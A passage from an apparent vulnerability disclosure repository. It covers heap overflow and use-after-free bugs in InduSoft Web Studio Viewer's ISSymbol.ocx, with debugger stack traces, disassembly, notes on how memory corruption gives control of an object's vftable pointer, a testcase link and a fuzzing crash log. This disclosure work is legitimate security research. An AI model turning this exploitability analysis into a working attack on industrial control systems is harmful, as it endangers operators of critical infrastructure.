0a4b15b0 00 00 23 00 43 00 6f 00-75 00 6e 00 74 00 65 00 ..#.C.o.u.n.t.e. 0a4b15c0 72 00 00 00 2f 00 ff ff-00 00 00 00 00 00 01 00 r.../........... 0a4b15d0 2f 00 00 00 00 00 00 00-00 00 02 00 02 00 00 00 /............... 30 | 31 | So, we can fill the current heap chunk with arbitrary controlled bytes, which is most probably exploitable. -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Heap Buffer Overflow EXPLOITABLE/testcase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Heap Buffer Overflow EXPLOITABLE/testcase -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Use After Free EXPLOITABLE/analysis.txt: -------------------------------------------------------------------------------- 1 | Software: Indusoft Web Studio Viewer 4.1.2.4 2 | Module: issymbol.ocx 3 | Type of vulnerability: Use after free / Double free 4 | 5 | Analysis 6 | 7 | First of all, the vulnerability is caught by the target software's runtime environment, which leads to a software-controlled crash dump. But in reality no exception is handled and thus we can probably control the crash. 8 | 9 | Stack upon trigger: 10 | 11 | 0:000> kb ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 0012ba04 5f161eef 00000001 5f161fe4 103f6258 0x69206e75 0012ba0c 5f161fe4 103f6258 0012bb20 10260e83 mfc90u!CException::Delete+0xd 0012ba18 10260e83 98c4f0f4 00000008 0000000f mfc90u!AfxTryCleanup+0x1d 0012bb2c 10261cf9 0012bf14 98c48888 0012ba74 ISSymbol!DllUnregisterServer+0x257023 0012c350 1028a0fa 0012d10c 98c48878 00000008 ISSymbol!DllUnregisterServer+0x257e99 0012c3a0 10031f70 0012d10c 00000001 98c4998c ISSymbol!DllUnregisterServer+0x28029a 0012d254 10025fdd 0a112b50 00000000 10392134 ISSymbol!DllUnregisterServer+0x28110 0012d2ec 1002ff68 0a0cdcd0 80000000 80000000 ISSymbol!DllUnregisterServer+0x1c17d 0012d9d8 10022136 0a0c84d8 98c4bbd8 00000000 ISSymbol!DllUnregisterServer+0x26108 0012f000 1001bfd2 98c4bf10 00003bf8 0012f04c ISSymbol!DllUnregisterServer+0x182d6 0012f4c8 1003f68d 00000000 98c4b2f4 0012f4ec ISSymbol!DllUnregisterServer+0x12172 0012f92c 5f1e2927 00332dbc 5f1cfd23 c7e3228a ISSymbol!DllUnregisterServer+0x3582d 0012f9dc 5f1d03f0 10395008 00000001 00000000 mfc90u!_AfxDispatchCall+0x10 0012fa80 5f1d11d6 00000001 00000060 5f115f88 mfc90u!COleDispatchImpl::Invoke+0x388 0012fb54 5f1eee36 00000060 00000001 00000000 mfc90u!COleDispatchDriver::InvokeHelperV+0x324 0012fb7c 5f19c7d6 00000060 00000001 00000000 mfc90u!COleControlSite::InvokeHelperV+0x57 0012fb9c 004021f1 0002ff10 00000060 00000001 mfc90u!CWnd::InvokeHelper+0x27 0012fbc4 0040d047 01321cf0 0002c2c0 0002c1c0 Viewer+0x21f1 0012fbdc 0040d0f4 0002c1c0 0012fc90 5f16fafa Viewer+0xd047 0012fbe8 5f16fafa 00000064 98c5cf12 00000113 Viewer+0xd0f4 0012fc90 5f16f6cc 00000113 00000064 00000000 mfc90u!CWnd::OnWndMsg+0x407 0012fcb0 0040a36c 00000113 00000064 00000000 mfc90u!CWnd::WindowProc+0x24 0012fcc8 5f16e2f2 00000113 00000064 00000000 Viewer+0xa36c 0012fd30 5f16e57e 00000000 001b04ac 00000113 mfc90u!AfxCallWndProc+0xa3 0012fd54 5f16c234 001b04ac 00000113 00000064 mfc90u!AfxWndProc+0x37 0012fd9c 76fcc4e7 001b04ac 00000113 00000064 mfc90u!AfxWndProcBase+0x56 0012fdc8 76fcc5e7 5f16c1de 001b04ac 00000113 USER32!InternalCallWinProc+0x23 0012fe40 76fccc19 0028912c 5f16c1de 001b04ac USER32!UserCallWinProcCheckWow+0x14b 0012fea0 76fccc70 5f16c1de 00000000 0012fee0 USER32!DispatchMessageWorker+0x35e 0012feb0 5f1ae491 002851e8 00000000 0041c6d0 USER32!DispatchMessageW+0xf 0012fec0 5f1aeb18 0041c6d0 0041c6d0 ffffffff mfc90u!AfxInternalPumpMessage+0x40 0012fee0 5f17af81 0041c818 00000001 00000000 mfc90u!CWinThread::Run+0x5b 0012fef4 0040507f 00400000 00000000 00271e56 mfc90u!AfxWinMain+0x6a 0012ff88 7726ee1c 7ffd8000 0012ffd4 773637eb Viewer+0x507f 0012ff94 773637eb 7ffd8000 4a2608df 00000000 kernel32!BaseThreadInitThunk+0xe 0012ffd4 773637be 004051ee 7ffd8000 00000000 ntdll!__RtlUserThreadStart+0x70 0012ffec 00000000 004051ee 7ffd8000 00000000 ntdll!_RtlUserThreadStart+0x1b 12 | 13 | This is the control transfer: 14 | 15 | 0:000> u mfc90u!CException::Delete mfc90u!CException::Delete: 5f161ee2 83790400 cmp dword ptr [ecx+4],0 5f161ee6 7e07 jle mfc90u!CException::Delete+0xd (5f161eef) 5f161ee8 8b01 mov eax,dword ptr [ecx] 5f161eea 6a01 push 1 5f161eec ff5004 call dword ptr [eax+4] <-- CRASH 5f161eef c3 ret 16 | 17 | The control is transferred into arbitrary memory within mfc90u.dll module: 18 | 19 | 0:000> db poi(ecx) 5f110062 62 65 20 72 75 6e 20 69-6e 20 44 4f 53 20 6d 6f be run in DOS mo 5f110072 64 65 2e 0d 0d 0a 24 00-00 00 00 00 00 00 d8 db de....$......... 5f110082 19 50 9c ba 77 03 9c ba-77 03 9c ba 77 03 bb 7c .P..w...w...w..| 5f110092 19 03 9d ba 77 03 02 9a-54 03 9d ba 77 03 bb 7c ....w...T...w..| 5f1100a2 1a 03 8d ba 77 03 95 c2-e4 03 9e ba 77 03 21 f5 ....w.......w.!. 5f1100b2 e1 03 9d ba 77 03 95 c2-e2 03 97 ba 77 03 95 c2 ....w.......w... 5f1100c2 f4 03 bc ba 77 03 95 c2-f3 03 97 ba 77 03 bb 7c ....w.......w..| 5f1100d2 0c 03 91 ba 77 03 9c ba-76 03 42 b9 77 03 95 c2 ....w...v.B.w... 20 | 21 | The vuln itself seems to reside in the following code (ret to ISSymbol!DllUnregisterServer+0x257e99), in which CException::Delete() is called directly first, and then it's called again (on the already freed CException object) from internals of the AfxTryCleanup() function: 22 | 23 | ISSymbol!DllUnregisterServer+0x256d00: 24 | .text:10260B60 v2_257e99_256d00 proc near ; CODE XREF: sub_10039050+35Ep .text:10260B60 ; sub_10039050+431p ... .text:10260B60 25 | ... .text:10260E2C loc_10260E2C: ; CODE XREF: v2_257e99_256d00+2D9j .text:10260E2C mov ecx, [ebp+var_A0] 26 | !!: .text:10260E32 call mfc90u_CException__Delete ; 1st call to CException::Delete .text:10260E37 xor ecx, ecx .text:10260E39 jnz short loc_10260E2C .text:10260E3B call ds:GetTickCount .text:10260E41 mov edx, [ebp+var_DC] .text:10260E47 mov [edx+0AF8h], eax .text:10260E4D mov [ebp+var_B8], 0 .text:10260E57 mov [ebp+var_4], 8 .text:10260E5E mov eax, offset loc_10260E7A ; called via CxxExceptionFilter()'s JumpToContiunation() .text:10260E63 retn [skip] .text:10260E7A .text:10260E7A loc_10260E7A: ; DATA XREF: v2_257e99_256d00+2FEo .text:10260E7A mov byte ptr [ebp+var_4], 3 27 | !!: .text:10260E7E call mfc90u_AfxTryCleanup ; 2nd call to CException::Delete (CRASH) .text:10260E83 mov byte ptr [ebp+var_4], 2 .text:10260E87 lea ecx, [ebp+var_60] .text:10260E8A call CArchive_constructor .text:10260E8F mov byte ptr [ebp+var_4], 1 .text:10260E93 lea ecx, [ebp+var_88] .text:10260E99 call mfc90u_CMemFile___CMemFile .text:10260E9E mov byte ptr [ebp+var_4], 0 .text:10260EA2 lea ecx, [ebp+var_8C] .text:10260EA8 call ds:mfc90u_600 ; CSimpleStringT .text:10260EAE mov [ebp+var_4], 0FFFFFFFFh .text:10260EB5 lea ecx, [ebp+var_90] .text:10260EBB call sub_1026BA80 .text:10260EC0 mov eax, [ebp+var_B8] .text:10260EC6 jmp loc_1026103B 28 | 29 | And this is exactly where the memory was corrupted: 30 | 31 | ntdll!RtlpLowFragHeapFree: 77352d0b 8bff mov edi,edi 77352d0d 55 push ebp 77352d0e 8bec mov ebp,esp 77352d10 83ec28 sub esp,28h 77352d13 53 push ebx 77352d14 56 push esi 77352d15 57 push edi 77352d16 8d7af8 lea edi,[edx-8] 77352d19 807f0705 cmp byte ptr [edi+7],5 77352d1d 0f848cf20300 je ntdll!RtlpLowFragHeapFree+0x14 (77391faf) 77352d23 8b07 mov eax,dword ptr [edi] 77352d25 8bf7 mov esi,edi 77352d27 c1ee03 shr esi,3 77352d2a 33f0 xor esi,eax 77352d2c 3335dc713d77 xor esi,dword ptr [ntdll!RtlpLFHKey (773d71dc)] <-- taint 77352d32 897dfc mov dword ptr [ebp-4],edi 77352d35 33f1 xor esi,ecx 77352d37 8b4604 mov eax,dword ptr [esi+4] 77352d3a 8945f4 mov dword ptr [ebp-0Ch],eax 77352d3d c6470780 mov byte ptr [edi+7],80h 77352d41 c6470600 mov byte ptr [edi+6],0 77352d45 8b5e08 mov ebx,dword ptr [esi+8] <-- taint 77352d48 8b4e0c mov ecx,dword ptr [esi+0Ch] 77352d4b 895de0 mov dword ptr [ebp-20h],ebx <-- taint 77352d4e 83c301 add ebx,1 77352d51 894de4 mov dword ptr [ebp-1Ch],ecx 77352d54 83d101 adc ecx,1 77352d57 81e3ff7f0000 and ebx,7FFFh 77352d5d 663b5e14 cmp bx,word ptr [esi+14h] 77352d61 0f84296c0000 je ntdll!RtlpLowFragHeapFree+0x62 (77359990) 77352d67 8b45e0 mov eax,dword ptr [ebp-20h] <-- taint 77352d6a 8b55e4 mov edx,dword ptr [ebp-1Ch] 77352d6d 0facd010 shrd eax,edx,10h 32 | !!: 77352d71 66894708 mov word ptr [edi+8],ax <-- put an arbitrary word into our CException vftable 33 | 34 | This is the freshly overwritten pointer to CException object which will be later used: 35 | 36 | 0:000> db edi+8 0a2232a8 62 00 11 5f 01 00 00 00-03 00 00 00 70 df 36 5f b.._........p.6_ 0a2232b8 fe 95 50 14 61 00 00 80-65 00 6d 00 65 00 74 00 ..P.a...e.m.e.t. 0a2232c8 65 00 72 00 73 00 0d 00-f3 95 50 14 5b 00 00 80 e.r.s.....P.[... 0a2232d8 68 00 3e 00 7c 00 31 00-7c 00 30 00 7c 00 30 00 h.>.|.1.|.0.|.0. 0a2232e8 f4 95 50 14 7c 00 00 80-6b 00 30 00 2e 00 30 00 ..P.|...k.0...0. 0a2232f8 30 00 30 00 30 00 30 00-c9 95 50 14 30 00 00 80 0.0.0.0...P.0... 0a223308 6e 00 30 00 30 00 30 00-30 00 30 00 7c 00 30 00 n.0.0.0.0.0.|.0. 0a223318 ca 95 50 14 30 00 00 80-71 00 30 00 30 00 7c 00 ..P.0...q.0.0.|. 37 | 38 | So, in theory we can control at least 2 least significant bytes of the pointer to CException object: 39 | 0a2232a8 62 00 11 5f 40 | 41 | Then, if we craft a CException object at this address, the second pointer of the object's vftable will be called upon trigger. 42 | 43 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Use After Free EXPLOITABLE/logs/crash_0fc4_2014-05-16_16-20-03-579.log: -------------------------------------------------------------------------------- 1 | Opened log file 'c:\crashes\crash_0fc4_2014-05-16_16-20-03-579.log' 2 | 3 | Last event: 67c.db8: Access violation - code c0000005 (first/second chance not available) 4 | debugger time: Fri May 16 16:20:03.564 2014 (UTC + 4:00) 5 | 6 | ChildEBP RetAddr Args to Child 7 | 0012a984 77345514 753d6be2 00000470 00000470 ntdll!KiFastSystemCallRet 8 | 0012a988 753d6be2 00000470 00000470 0012a9a8 ntdll!NtClose+0xc 9 | 0012a998 7726e940 00000470 00000000 0012ab40 KERNELBASE!CloseHandle+0x2d 10 | 0012a9a8 7182c127 00000470 0bfbab38 0012b1c4 kernel32!CloseHandleImplementation+0x3f 11 | 0012ab40 07ac0000 0bfbab38 0012b1c4 0012aca8 dbghelp!Win32LiveSystemProvider::OpenMapping+0x1fe 12 | WARNING: Frame IP not in any known module. Following frames may be wrong. 13 | 0012ab90 77356594 0a100138 77356570 773541e7 0x7ac0000 14 | 0012ac80 773565a6 00000000 0a100cd0 0a100904 ntdll!RtlpFreeHeap+0xbb1 15 | 0012ac98 77345514 753d6be2 00000434 00000434 ntdll!RtlFreeHeap+0x142 16 | 0012acac 7726e940 00000434 0012ac9c 0012b0d8 ntdll!NtClose+0xc 17 | 0012acbc 7182a6ac 0012b1c4 0bf90048 0a100930 kernel32!CloseHandleImplementation+0x3f 18 | 0012b0d8 0a100958 00000000 00000000 0012b290 dbghelp!GenGetProcessInfo+0x53e 19 | 0012b0e4 0012b290 00000000 44206e69 00000008 0xa100958 20 | 00000000 00000000 00000000 00000000 00000000 0x12b290 21 | 22 | eax=000002c8 ebx=0a102480 ecx=0012a994 edx=0a102440 esi=0a102440 edi=0012aca8 23 | eip=773470f4 esp=0012a968 ebp=0012a978 iopl=0 nv up ei pl zr na pe nc 24 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 25 | ntdll!KiFastSystemCallRet: 26 | 773470f4 c3 ret 27 | 28 | ntdll!RtlUserThreadStart+0xc: 29 | 773470e4 008da4240000 add byte ptr [ebp+24A4h],cl 30 | 773470ea 0000 add byte ptr [eax],al 31 | 773470ec 8d642400 lea esp,[esp] 32 | ntdll!KiFastSystemCall: 33 | 773470f0 8bd4 mov edx,esp 34 | 773470f2 0f34 sysenter 35 | ntdll!KiFastSystemCallRet: 36 | 773470f4 c3 ret 37 | 773470f5 8da42400000000 lea esp,[esp] 38 | 773470fc 8d642400 lea esp,[esp] 39 | ntdll!KiIntSystemCall: 40 | 77347100 8d542408 lea edx,[esp+8] 41 | 77347104 cd2e int 2Eh 42 | 43 | PEB at 7ffd6000 44 | InheritedAddressSpace: No 45 | ReadImageFileExecOptions: No 46 | BeingDebugged: No 47 | ImageBaseAddress: 00400000 48 | Ldr 773d7880 49 | Ldr.Initialized: Yes 50 | Ldr.InInitializationOrderModuleList: 002e2030 . 003a14a8 51 | Ldr.InLoadOrderModuleList: 002e1fa0 . 003a1498 52 | Ldr.InMemoryOrderModuleList: 002e1fa8 . 003a14a0 53 | Base TimeStamp Module 54 | 400000 533cc8c5 Apr 03 06:34:45 2014 C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe 55 | 77300000 521ea91c Aug 29 05:51:24 2013 C:\Windows\SYSTEM32\ntdll.dll 56 | 77220000 531599f5 Mar 04 13:16:37 2014 C:\Windows\system32\kernel32.dll 57 | 753d0000 531599f6 Mar 04 13:16:38 2014 C:\Windows\system32\KERNELBASE.dll 58 | 63f00000 4dad06e1 Apr 19 07:52:01 2011 C:\Windows\WinSxS\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_4bf7e3e2bf9ada4c\mfc90u.dll 59 | 71620000 4dace5b9 Apr 19 05:30:33 2011 C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90.dll 60 | 76fb0000 4ce7ba26 Nov 20 16:08:06 2010 C:\Windows\system32\USER32.dll 61 | 76af0000 524ccf2f Oct 03 05:58:07 2013 C:\Windows\system32\GDI32.dll 62 | 77440000 51b0158a Jun 06 08:52:26 2013 C:\Windows\system32\LPK.dll 63 | 76db0000 4ce7ba29 Nov 20 16:08:09 2010 C:\Windows\system32\USP10.dll 64 | 756e0000 4eeaf722 Dec 16 11:45:38 2011 C:\Windows\system32\msvcrt.dll 65 | 75680000 4ce7b9e2 Nov 20 16:06:58 2010 C:\Windows\system32\SHLWAPI.dll 66 | 743b0000 4ce7b71c Nov 20 15:55:08 2010 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\COMCTL32.dll 67 | 72540000 4a5bdaa0 Jul 14 05:08:48 2009 C:\Windows\system32\MSIMG32.dll 68 | 759b0000 521ea86a Aug 29 05:48:26 2013 C:\Windows\system32\ADVAPI32.dll 69 | 75a50000 4a5bdb04 Jul 14 05:10:28 2009 C:\Windows\SYSTEM32\sechost.dll 70 | 77480000 51db96a4 Jul 09 08:50:44 2013 C:\Windows\system32\RPCRT4.dll 71 | 76e50000 4ce7b96f Nov 20 16:05:03 2010 C:\Windows\system32\ole32.dll 72 | 76930000 4e58702a Aug 27 08:18:50 2011 C:\Windows\system32\OLEAUT32.dll 73 | 71960000 4a5bdb63 Jul 14 05:12:03 2009 C:\Windows\system32\WSOCK32.dll 74 | 76d70000 4ce7ba68 Nov 20 16:09:12 2010 C:\Windows\system32\WS2_32.dll 75 | 76d60000 4a5bdad9 Jul 14 05:09:45 2009 C:\Windows\system32\NSI.dll 76 | 65e90000 4ce7ba42 Nov 20 16:08:34 2010 C:\Windows\system32\WINMM.dll 77 | 77450000 4ce7b845 Nov 20 16:00:05 2010 C:\Windows\system32\IMM32.DLL 78 | 767e0000 4a5bda69 Jul 14 05:07:53 2009 C:\Windows\system32\MSCTF.dll 79 | 74230000 4a5bdb38 Jul 14 05:11:20 2009 C:\Windows\system32\UxTheme.dll 80 | 73f00000 4a5bda07 Jul 14 05:06:15 2009 C:\Windows\system32\dwmapi.dll 81 | 724e0000 4dad065b Apr 19 07:49:47 2011 C:\Windows\WinSxS\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_49768ef57548175e\MFC90ENU.DLL 82 | 63bf0000 4dd2940a May 17 19:28:10 2011 C:\Users\user\Desktop\fuzzing-client-win32\tools\XcptMon\XcptMonDll.dll 83 | 74810000 4a5bdb2b Jul 14 05:11:07 2009 C:\Windows\system32\VERSION.dll 84 | 717e0000 4ce7b7bc Nov 20 15:57:48 2010 C:\Windows\system32\dbghelp.dll 85 | 75270000 4a5bbf41 Jul 14 03:12:01 2009 C:\Windows\system32\CRYPTBASE.dll 86 | 75b00000 5330e506 Mar 25 06:08:06 2014 C:\Windows\system32\Shell32.dll 87 | 76750000 4a5bd9b1 Jul 14 05:04:49 2009 C:\Windows\system32\CLBCatQ.DLL 88 | 10000000 533cc945 Apr 03 06:36:53 2014 C:\PROGRA~1\INDUSO~1.1\Bin\ISSymbol.ocx 89 | 768b0000 4ce7b82d Nov 20 15:59:41 2010 C:\Windows\system32\COMDLG32.dll 90 | 6c470000 4ce7ba4b Nov 20 16:08:43 2010 C:\Windows\system32\WINSPOOL.DRV 91 | 769c0000 53180948 Mar 06 09:36:08 2014 C:\Windows\system32\urlmon.dll 92 | 75530000 50f322ec Jan 14 01:11:08 2013 C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll 93 | 75670000 50f3244f Jan 14 01:17:03 2013 C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll 94 | 75520000 50f3243a Jan 14 01:16:42 2013 C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll 95 | 75420000 50f322f9 Jan 14 01:11:21 2013 C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll 96 | 75660000 50f322eb Jan 14 01:11:07 2013 C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll 97 | 75480000 50f3244e Jan 14 01:17:02 2013 C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll 98 | 75af0000 4a5bdad4 Jul 14 05:09:40 2009 C:\Windows\system32\normaliz.DLL 99 | 76b40000 5318281c Mar 06 11:47:40 2014 C:\Windows\system32\iertutil.dll 100 | 75790000 53180a85 Mar 06 09:41:25 2014 C:\Windows\system32\WININET.dll 101 | 72e30000 515bb50a Apr 03 08:50:18 2013 C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36\gdiplus.dll 102 | 69030000 4dace5bd Apr 19 05:30:37 2011 C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90.dll 103 | 77080000 4ce7b9d9 Nov 20 16:06:49 2010 C:\Windows\system32\SETUPAPI.dll 104 | 753a0000 4ce7b787 Nov 20 15:56:55 2010 C:\Windows\system32\CFGMGR32.dll 105 | 75430000 4a5bd9c5 Jul 14 05:05:09 2009 C:\Windows\system32\DEVOBJ.dll 106 | 629f0000 4ce7b8e3 Nov 20 16:02:43 2010 C:\Windows\system32\MSVFW32.dll 107 | 1d50000 3650a4f4 Nov 17 02:19:32 1998 C:\PROGRA~1\INDUSO~1.1\Bin\imgman32.dll 108 | 13a0000 3650a3d5 Nov 17 02:14:45 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31bmp.dil 109 | 13b0000 3650a451 Nov 17 02:16:49 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31dxf.dil 110 | 13f0000 3650a3e0 Nov 17 02:14:56 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31eps.dil 111 | 1410000 3650a45e Nov 17 02:17:02 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31fax.dil 112 | 2be0000 3650a3cc Nov 17 02:14:36 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31fpx.dil 113 | 13d0000 3650a3f2 Nov 17 02:15:14 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31img.dil 114 | 1db0000 3650a428 Nov 17 02:16:08 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31jpg.dil 115 | 1430000 3650a464 Nov 17 02:17:08 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31pcd.dil 116 | 2c40000 2fe85ad5 Jun 21 21:45:57 1995 C:\Program Files\Schneider Electric\IGSS32\V10.0\GSS\PCDLIB32.dll 117 | 1df0000 3650a406 Nov 17 02:15:34 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31pcx.dil 118 | 2ba0000 3650a40f Nov 17 02:15:43 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31png.dil 119 | 2220000 3650a416 Nov 17 02:15:50 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31tga.dil 120 | 2c90000 3650a57a Nov 17 02:21:46 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31tif.dil 121 | 2cc0000 3650a440 Nov 17 02:16:32 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31wmf.dil 122 | 2ce0000 3650a3ff Nov 17 02:15:27 1998 C:\Program Files\InduSoft Web Studio v7.1\BIN\im31wpg.dil 123 | 2d00000 533cc94f Apr 03 06:37:03 2014 C:\PROGRA~1\INDUSO~1.1\Bin\INDHTTP.DLL 124 | 3ce0000 533cce89 Apr 03 06:59:21 2014 C:\PROGRA~1\INDUSO~1.1\Bin\HostDotNETManager.dll 125 | 71020000 4b90752b Mar 05 07:06:19 2010 C:\Windows\SYSTEM32\MSCOREE.DLL 126 | 63850000 4dad06f2 Apr 19 07:52:18 2011 C:\Windows\WinSxS\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_4bf7e3e2bf9ada4c\MFCM90U.dll 127 | 63eb0000 4dace5c3 Apr 19 05:30:43 2011 C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcm90.dll 128 | 70fa0000 52310949 Sep 12 04:22:33 2013 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll 129 | 6ba50000 5265cfa2 Oct 22 05:06:42 2013 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll 130 | 6c390000 4dcddbf3 May 14 05:33:39 2011 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll 131 | 75320000 4a5bbf41 Jul 14 03:12:01 2009 C:\Windows\system32\profapi.dll 132 | 6af50000 5265d021 Oct 22 05:08:49 2013 C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll 133 | 6aef0000 506c153c Oct 03 14:36:44 2012 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll 134 | 74d90000 4a5bda3d Jul 14 05:07:09 2009 C:\Windows\system32\CRYPTSP.dll 135 | 74b30000 4a5bdae0 Jul 14 05:09:52 2009 C:\Windows\system32\rsaenh.dll 136 | 5800000 533cc82d Apr 03 06:32:13 2014 C:\PROGRA~1\INDUSO~1.1\Bin\IndRAS.DLL 137 | 73b50000 4a5bdad7 Jul 14 05:09:43 2009 C:\Windows\system32\RASAPI32.dll 138 | 73b30000 4a5bdadf Jul 14 05:09:51 2009 C:\Windows\system32\rasman.dll 139 | 58e0000 533cc88a Apr 03 06:33:46 2014 C:\PROGRA~1\INDUSO~1.1\Bin\IndTapi.dll 140 | 6c430000 4a5bdb1b Jul 14 05:10:51 2009 C:\Windows\system32\TAPI32.dll 141 | 73b20000 4ce7b9ac Nov 20 16:06:04 2010 C:\Windows\system32\rtutils.dll 142 | 75200000 5348a0c0 Apr 12 06:11:12 2014 C:\Windows\system32\SspiCli.dll 143 | 9c50000 533cc7d9 Apr 03 06:30:49 2014 C:\PROGRA~1\INDUSO~1.1\Bin\score.dll 144 | 734a0000 4ce7b859 Nov 20 16:00:25 2010 C:\Windows\system32\IPHLPAPI.DLL 145 | 73490000 4a5bdb43 Jul 14 05:11:31 2009 C:\Windows\system32\WINNSI.DLL 146 | 71700000 533cceec Apr 03 07:01:00 2014 C:\PROGRA~1\INDUSO~1.1\Bin\StudioDrawAPI.dll 147 | 74d50000 522bdb3e Sep 08 06:04:46 2013 C:\Windows\system32\mswsock.dll 148 | 748a0000 4a5bdb5a Jul 14 05:11:54 2009 C:\Windows\System32\wshtcpip.dll 149 | 736a0000 4ce7b90f Nov 20 16:03:27 2010 C:\Windows\system32\NLAapi.dll 150 | 67110000 4a5bda6d Jul 14 05:07:57 2009 C:\Windows\system32\napinsp.dll 151 | 670f0000 4a5bdaf6 Jul 14 05:10:14 2009 C:\Windows\system32\pnrpnsp.dll 152 | 74c10000 4d6f2733 Mar 03 09:29:23 2011 C:\Windows\system32\DNSAPI.dll 153 | 670e0000 4a5bdb44 Jul 14 05:11:32 2009 C:\Windows\System32\winrnr.dll 154 | 73380000 5258ada6 Oct 12 06:02:14 2013 C:\Windows\System32\fwpuclnt.dll 155 | 71070000 4a5bdad6 Jul 14 05:09:42 2009 C:\Windows\system32\rasadhlp.dll 156 | 78c0000 533cc8a5 Apr 03 06:34:13 2014 C:\PROGRA~1\INDUSO~1.1\Bin\IndVkStd.dll 157 | 73340000 4a5bd9b5 Jul 14 05:04:53 2009 C:\Windows\system32\dhcpcsvc.DLL 158 | 63950000 53182b95 Mar 06 12:02:29 2014 C:\Windows\system32\vbscript.dll 159 | 75280000 4ce7ba06 Nov 20 16:07:34 2010 C:\Windows\system32\SXS.DLL 160 | 62a80000 4a5bdae6 Jul 14 05:09:58 2009 C:\Program Files\Common Files\Microsoft Shared\Ink\rtscom.dll 161 | 73da0000 50f30e59 Jan 13 23:43:21 2013 C:\Windows\system32\WindowsCodecs.dll 162 | 75220000 4ce7b73e Nov 20 15:55:42 2010 C:\Windows\system32\apphelp.dll 163 | 5fbc0000 4ce7ba63 Nov 20 16:09:07 2010 C:\Windows\system32\wpdshext.dll 164 | 73ca0000 51f1d730 Jul 26 05:56:00 2013 C:\Windows\System32\shdocvw.dll 165 | 74270000 4ce7b983 Nov 20 16:05:23 2010 C:\Windows\system32\PROPSYS.dll 166 | 5d940000 5318172e Mar 06 10:35:26 2014 C:\Windows\System32\ieframe.dll 167 | 672e0000 50f322eb Jan 14 01:11:07 2013 C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll 168 | 73960000 4a5bdb0c Jul 14 05:10:36 2009 C:\Windows\system32\powrprof.dll 169 | 77470000 4a5bdace Jul 14 05:09:34 2009 C:\Windows\system32\psapi.dll 170 | SubSystemData: 00000000 171 | ProcessHeap: 002e0000 172 | ProcessParameters: 002e13e0 173 | CurrentDirectory: 'C:\Users\user\Desktop\fuzzing-client-win32\tests\indusoft-viewer\' 174 | WindowTitle: 'InduSoft Web Studio v7.1' 175 | ImageFile: 'C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe' 176 | CommandLine: '"C:\Program Files\InduSoft Web Studio v7.1\BIN\Viewer_.exe" /nosplash /noprogressbar /ds1:localhost /dsp:1234 /url:"file://y:\\PCDemo\PCDemo.APP"' 177 | DllPath: 'C:\Program Files\InduSoft Web Studio v7.1\BIN;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Schneider Electric\IGSS32\V10.0\GSS\;C:\Program Files\Parallels\Parallels Tools\Applications;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Windows Kits\8.0\Windows Performance Toolkit\;C:\Program Files\Schneider Electric\Pelco Viewer 3.0.0\Libs;c:\test;C:\Program Files\Common Files\Schneider Electric Shared\SSTA\;C:\Program Files\Common Files\Schneider Electric Shared\SRCSDK\' 178 | Environment: 002e07f0 179 | =::=::\ 180 | =C:=C:\Users\user\Desktop\fuzzing-client-win32\tests\indusoft-viewer 181 | =ExitCode=00000000 182 | ALLUSERSPROFILE=C:\ProgramData 183 | 